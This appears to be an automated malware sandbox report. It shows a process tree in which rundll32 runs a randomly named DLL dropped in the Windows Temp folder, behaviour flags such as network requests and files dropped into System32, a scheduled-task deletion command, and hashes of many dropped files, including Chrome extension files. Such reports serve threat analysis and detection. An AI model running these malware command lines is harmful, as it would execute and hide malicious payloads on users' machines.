\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\PIXVXvKWgaYNyGUO\KZjcCnKh\bxdnXWa.dll",#1 /dosite_idmTY 5254031⤵PID:208
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\PIXVXvKWgaYNyGUO\KZjcCnKh\bxdnXWa.dll",#1 /dosite_idmTY 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4660 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "djzsCuSYobhMFkMDx"3⤵PID:764
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56e33c78b353872b109c817b21f27b058
SHA1d51120d9c547500acf3ce733e43ff6f410650716
SHA25675ff25949f606cd0e277d4388bc1e7e3f8d104056b669c8b36abe3af3c7d27fe
SHA5127c9205ad3dcb64453673416026ba7e3612bcbb1834c08cdb494c688eaa20f17dd57c70d6111c4556d933932bc5819862d1313c368920e264bba10e56ca993f54
-
Filesize
2KB
MD5b2bcc2df22b2bcd015a10afb5f81efb9
SHA11591e980bf690cddb1b39e0b408530ca72d361e1
SHA256a1344d0f8c126825cb2f1e900d39c49b1fc35adbcf3c60947853080d4c2cea6c
SHA5123e1341b63a6a9a72f080b9f7e5b5ea53e320a03355b98e08ef922eb2be9f80e1ceb3f132af9eafe2c21f3d13049543f700b3e91ee0bcaba8e978d7e3608c0142
-
Filesize
2KB
MD56a157660a0beefed56e178d6ada3d4b8
SHA1458bdffde7beee61040a2ce42922df0b8178c4a5
SHA256e8e69ebb9cae31f0ff2ab77a687d5d507f70ac9eadc6d4f483ecbb4739ade5ac
SHA5123d22cca744ab40f1d7f20142e3f9d8e332e0c18b9dd1589ae6d0bae53af717b737c1bc460f7e65fe158c391a427ce9456b72f7b7ce0d4e485acadf8a6c7657ae
-
Filesize
2KB
MD5abd96d538b9b3082b6a12c13336bb020
SHA19d8fd01cc1919c0fa446f7af8cdd1fe1c1d5fb8c
SHA25632d5a1f03ae7baae0b41be6ec92796a2373c5b00b862f94ee73dc946e123d4c7
SHA51239b3dc2537e9cf98ca943903c522d1136bc9b1b30d207b94fe0f1a9a5a7e513bf0015af842aa238e9ac705c958bb243379b95ec660999b7bdf735831198b7f85
-
Filesize
2.0MB
MD5c6618b42d28ec242d60a5219a0e7928e
SHA1b901b2b86790d9feb402ccaaa372597caf770785
SHA256ed324ffd2cc22a8028787d4cd7ccbcc2c0d1bc3bda8e8eed17424872816deaf5
SHA5126866bb2da5f7c5710a479ab6ade601b3d7d21e21a78194bddd0b689529fc45a52eba578933a3cc7620d0aa7cd55e9ca429ef0f665bedab192a8f4b146b4a0db7
-
Filesize
2KB
MD581e602086f743651bd30e21004d05be2
SHA16eb0282142b7ac3430c9878f78779f45a7d707e7
SHA256bdec5da12d2f55dd8507a47f3456fd3e7971688895059e4ddbfb930c02979611
SHA512f11f0c9b15f2c0d38fbfd60de74eaf9e65e9b8aa81edbecacf18a2186c98a98b0c10b4b9f6b6a38902557549e879fa0b89d3bcfabffa935887aaaefa8e13af10
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5cc3812de7f6708ba03fcc2cf82f8d69d
SHA1ad7c5a09c768c9495c2e3a6efb37eb243b1b596d
SHA25600512fbbc12f32d3f8d686ec1297397752a61fe6745d6723138c44e227486fff
SHA5121096b75eb13d6d415bbf1eb21b13277b8995f87f7467387349f50cd1e1eee42f8f28c3394e4ed1596b1cd919897dbc49c4b70fa774802d834e5b7dccf33dd507
-
Filesize
35KB
MD5de398708048ee47df77d8f2bb3887ec4
SHA1854c70e5aa51134b8aa3c3d1a3416b5ba6f31a25
SHA256ea5bf2a2f8aa36f311ed7b638a9257514c3903eb40632d098b637fed48897869
SHA5121482696423e7ddb34d78aed99be438337b99c127a494cc2a235081938d7f4970db9fb422f37c0e8cf9918fbcf17da530579eb7b3fa2ff1ed33af4417d4d50aba
-
Filesize
3KB
MD5f6c90ab0db80c6c3ea92556fda7273c7
SHA101d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe
-
Filesize
1KB
MD5e40e9e690ded47f8eaa1250e2ecf3ea5
SHA18e6c619b92e3f8814715bd9e200a3098f15aede8
SHA25600289340671e76959b52e9190c09ad57edfa169524ba932df0a1ea53a23fac39
SHA512b0848ca541bc42266a08f8bd08d852373ad3b19178d53a11b9018aadcf525a287b9fb11404cb45cda413e6b03d9deaa5a1dd434d479dca2de9c0c71c7b63d489
-
Filesize
16KB
MD5fa5497433a2787adc20b1ea53fe921ed
SHA1e2c2fe8ff5667db3c2516152e59b3a10819eb2e6
SHA25649991ff5efeb610cce6b8d4f26e97b7761d156c0cd4e7da25aa5d024f82adc9b
SHA5122cdbf32e1844127a560f9257385e0b27dee3853c3001a1e7ebe987dc1b36b7271568cb7d814be4981303a52e0bd6c8a1a21d3de61c8b4896ae6d9b4d154da2f2
-
Filesize
3.0MB
MD57277f43d427747f5b30f7cb2a50607f7
SHA10b1e80dce3fcac1bbc19a7665151e1931113a51f
SHA256a17561bf06ed6954f970f830b72cc1424b3535f97d2f5cddbf14475ba456a3a2
SHA512c1f39e7fe706fe583c26f4d24680b75433bc4a8ad4bce7ee5bb1ae96ab87270751ae1024bab94094c5567c9af2998fe45b143de0260694edb968d66332625ec6
-
Filesize
3.0MB
MD59eef1faa908f95192d8053446337e70c
SHA1592e3238cb0a672cfd4a64e5c7c40cc9709c722d
SHA2568433bc3327b19cc57c111656f876210335858f4eae4a29213b85970c24615f88
SHA51225a86bd119afb936504eccb383c3cf058e0d735c26fb2d713addc81077e46110f350b03fc275b380c2e62974c267a484b633c8cc0f809dc7508a911f43989b97
-
Filesize
6.9MB
MD53ea4bd17505b077cca2b39ca4f91c60e
SHA1ae0f344e6c8af2a160e9ea89ef6007d08f443d54
SHA256fb5dacc89b0cc468d6906ba79753ec36cc074a0a2c1f6d908eb44433cf1b0f4a
SHA512c3551c6689f3dca87347da04fcbccc4910db49070f1553da9035e89dc11a06dc24dcf538c73a161a08ae4d5a00f0a5000a8bf52891d8ac5b20b92a3e4db8a7d1
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
5.9MB
MD5fc2508d58fca2ce15a2ddbaea2a07cd9
SHA1520dc84e93993ced339310c2717768d9f4715aa3
SHA256b80d4230b3097c66aaf52b944ec9bfe845eb96f80c48512bab653860ecd2e78d
SHA5127debd5ecc1af47b2a950ba0753c9b6d518673bf72fb70af1b7f90744e068d6fa68a7ff0971c875b6b9cc2ef4f62c2fc03ea3a05d6cf6b1f9ff7883c2b0d16b21
-
Filesize
5.7MB
MD5e6cd9abd1b1b8d718a563b5a248e9641
SHA103dca705edf657e1e2ac2a12bd7a9772629f8531
SHA256224ae5b1e8d004615fe2cc6f8ac20cc9f47d1f05ca03a7fc6dc0528865e0485b
SHA512e43a53d53786d10f1b75a9662c1118283193a45161a44fba4405ad59621553c0a57336df25dafb3ac90e81fc9feb7e9a359eb2d95e50f088c8cb2846edf87a61
-
Filesize
6KB
MD5f9c326a48f43ab2004172f97b8495671
SHA1d90dc528c53c07e8f1d04dd3985ff25452ed7f79
SHA256b84d5f8fa3a6e756089c858a5f846f7ef7805bb9e45ce912bc5ba5e0b7ceda4c
SHA5123c6647dfabea1ea40bf84bec18b4969b8bbfef97135d979465ca6295f0138ac2af05b9b57825f4366f1653888de5d4f0952a485b248734e14bee5dd83a6a7636
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5d9bf2aafbd3423f52d4708291414bc34
SHA141a4762cada634243b0d4d3f6c8a3f95cb7a592a
SHA2567648b808a2936c15b390e49c02780bee99f6ad0dd01ba68b20ec4f1028adace8
SHA5126f611ec4c013ddb67207007a9739467c05a11f9e8b23f1924dc3ad77d5cdf047a66b0ea87690b7496eaa0e984ceea24faed94c86907720ab3ebeb1201a18d809
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD55fc33e73b73adc2ebeb1bd899931291b
SHA169ea22b00189f3e784d26687084dd76ab7bc48c0
SHA256c7e5e6177be7ddd5748787a0f48a5ce45fdb2d30b5eec94d2a68797822a1523c
SHA5125bc2aebbd874f36f8173c7bd82156e05564bae2c9312bd873ba6cc39bcf1d3bc9617f5fd6650c54db0d2dcdb18e478b9aab323a8337bad07fd02e29c30192876
-
Filesize
6.4MB
MD5f612b812e14c24cccbc8872d8b194d4e
SHA16aaa091e7ce7b974af985c5253752c7491701116
SHA256e736b98de505af8213fbe3cb1110cd762b75af0fdfcb6faad49587063260e352
SHA512e1a3e11ff9ae312f44fe9527fd2a905dab18964458ade8740b5acd084e6c50f359c76cd01957ff38b5de08802f66776751b2bed6a3d6a271c36ffb309aba419b
-
Filesize
5.5MB
MD5058d611744da41cb386787a7777c1b83
SHA135b874a922e04123ceaf5e0ce7419e961395637c
SHA256c61dab04c61e503a982032e720dff2b119e01b53b028fb3badc0b4148682dec8
SHA512f76a363f67f55ff4657b72756e81d6a06f75881881a8075f471692bae534a7ea0b993d60ae2b9d5e5b384067eec42b19fdb83dc2afdfeb9ade9a2f9ce4e848fd
-
Filesize
5.2MB
MD54d18e6a6ac9fcc118931c03f0d5b5f5b
SHA19f5223c1336321f1bf8b2e3e9c322bc2e37b238e
SHA256c479c41f927025df008666d2993b953ef84f5d4f2ebd635a2e61e50c52766d12
SHA51276fb53e795274a195126c47b164d411a03459f37bd0fa467219f3b96a0caf0cd9fd9ca979d03656a4b6e4f231c23179c151bc59610abb2a9e908ee27915e9fb0
-
Filesize
6KB
MD55a5e43f319d4462d3c6e750cecf0d31f
SHA15b8391a5bfd7e2db16fac376ed5a14bfd33a1d7d
SHA2560a2c6593074f7fcd880567d94005a7b4265e8160d77de0b6391055b5874ce563
SHA512fe0948b3a281e895799c904537e12d6091e85bd509d9077022a0b846591cb9acdc01c0a9a59f0a11862f317d98f8cce0ffd4c46d472626c9f69574f1bd1bf502
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732